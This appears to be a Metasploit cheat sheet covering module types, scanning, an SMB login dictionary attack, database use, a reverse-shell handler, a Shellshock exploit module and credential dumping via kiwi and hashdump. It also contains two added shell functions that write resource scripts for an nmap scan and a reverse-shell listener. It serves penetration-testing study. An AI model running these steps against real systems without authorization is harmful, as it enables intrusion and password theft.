Metasploit

Modules

  • Auxiliary: scanners, crawlers and fuzzers
  • Encoders: encode payloads
  • Evasion: prepare payloads to circumvent signature-based malware detection
  • NOPs: NOP generators for various architectures
  • Payloads: code to run on target systems
    • Singles: inline, self-contained payloads, for example generic/shell_reverse_tcp
    • Stagers: small payloads that download the stage
    • Stages: for example windows/x64/shell/reverse_tcp
  • Post: post-exploitation modules

Notes

  • Search by module type
search type:auxiliary <stuff>
  • Run the exploit without interacting with the session
run -z
  • check tests whether the target is vulnerable
  • setg sets a variable globally
  • unset payload clears the selected payload
  • Flush all variables via unset all

Sessions

  • Background a session via background or Ctrl+Z
  • Foreground a session via sessions -i <number>

Scanning

  • Portscan modules
search portscan
  • UDP sweep via scanner/discovery/udp_sweep
  • SMB scan via scanner/smb/smb_version and smb_enumshares
  • SMB login dictionary attack via scanner/smb/smb_login
  • NetBIOS via scanner/netbios/nbname
  • HTTP version via scanner/http/http_version

Database

  • Start PostgreSQL
  • Initialise the database via msfdb init
  • Check the database connection via db_status
  • Separate workspace via workspace -a <projectname>
  • Store scan results in the database via db_nmap
  • Show hosts via hosts
  • Show services via services
  • Set RHOST values from the stored hosts via hosts -R
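The database steps above are usually typed one after another in msfconsole; the shell function below is an added example (not part of the compendium) that writes them into a resource script so a lab workflow is repeatable. The function name, the workspace name labnet and the target range 192.0.2.0/28 (the documentation range, constructed here) are assumptions; the msfconsole commands are the ones listed above.

```shell
# Added example (not the compendium's own): generate an msfconsole resource
# script that runs the database workflow against a lab range.
# Usage: write_db_workflow_rc <workspace> <target-range> <outfile>
# Both arguments are interpolated into the rc file, so they are restricted to
# the characters a workspace name or an nmap target spec needs; anything else
# (spaces, quotes, shell metacharacters) is refused.
write_db_workflow_rc() {
    ws="$1"; range="$2"; out="$3"
    case "$ws" in
        ''|*[!A-Za-z0-9_.-]*) echo "bad workspace name: $ws" >&2; return 1 ;;
    esac
    case "$range" in
        ''|*[!A-Za-z0-9./:,-]*) echo "bad target spec: $range" >&2; return 1 ;;
    esac
    cat > "$out" <<EOF
# generated by write_db_workflow_rc for workspace '$ws'
db_status
workspace -a $ws
db_nmap -sV --open $range
hosts
services
hosts -R
EOF
}

# Demo with constructed values: a lab workspace and the TEST-NET-1 range.
demo_rc="$(mktemp)"
write_db_workflow_rc labnet 192.0.2.0/28 "$demo_rc" && cat "$demo_rc"
```

Feed the generated file to msfconsole with `msfconsole -q -r "$demo_rc"`; after the script runs, RHOSTS is already populated from the database for whatever module you select next.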

Exploits

  • show targets
  • show payloads

Reverse Shells

  • Multi/handler, set options
use exploit/multi/handler
set payload <payloadhandler>
  • Shellshock as an example
use multi/http/apache_mod_cgi_bash_env_exec
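The multi/handler setup above needs the same three options every time; the shell function below is an added example (not from the compendium) that validates them and writes a resource script for the listener. The function name and the sample values (the single payload generic/shell_reverse_tcp named above, LHOST 192.0.2.10 from the documentation range, port 4444) are assumptions constructed for the demo.

```shell
# Added example (not the compendium's own): write a resource script that
# starts the multi/handler listener from the notes above.
# Usage: write_handler_rc <payload> <LHOST> <LPORT> <outfile>
write_handler_rc() {
    payload="$1"; lhost="$2"; lport="$3"; out="$4"
    # payload names are module paths: letters, digits, '/', '_' and '-' only
    case "$payload" in
        ''|*[!A-Za-z0-9/_-]*) echo "bad payload name: $payload" >&2; return 1 ;;
    esac
    # LHOST is an IPv4/IPv6 literal or a hostname
    case "$lhost" in
        ''|*[!A-Za-z0-9.:-]*) echo "bad LHOST: $lhost" >&2; return 1 ;;
    esac
    # LPORT must be an integer in 1..65535
    case "$lport" in
        ''|*[!0-9]*) echo "bad LPORT: $lport" >&2; return 1 ;;
    esac
    [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || {
        echo "LPORT out of range: $lport" >&2; return 1; }
    cat > "$out" <<EOF
use exploit/multi/handler
set payload $payload
set LHOST $lhost
set LPORT $lport
run -z
EOF
}

# Demo with constructed lab values.
demo_rc="$(mktemp)"
write_handler_rc generic/shell_reverse_tcp 192.0.2.10 4444 "$demo_rc" && cat "$demo_rc"
```

Start the listener with `msfconsole -q -r "$demo_rc"`; because the script ends in `run -z`, the console stays usable and any session that arrives is listed by `sessions` rather than grabbed interactively.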

Post Exploitation

  • Windows
    • load kiwi
    • hashdump
  • Linux
    • use post/linux/gather/hashdump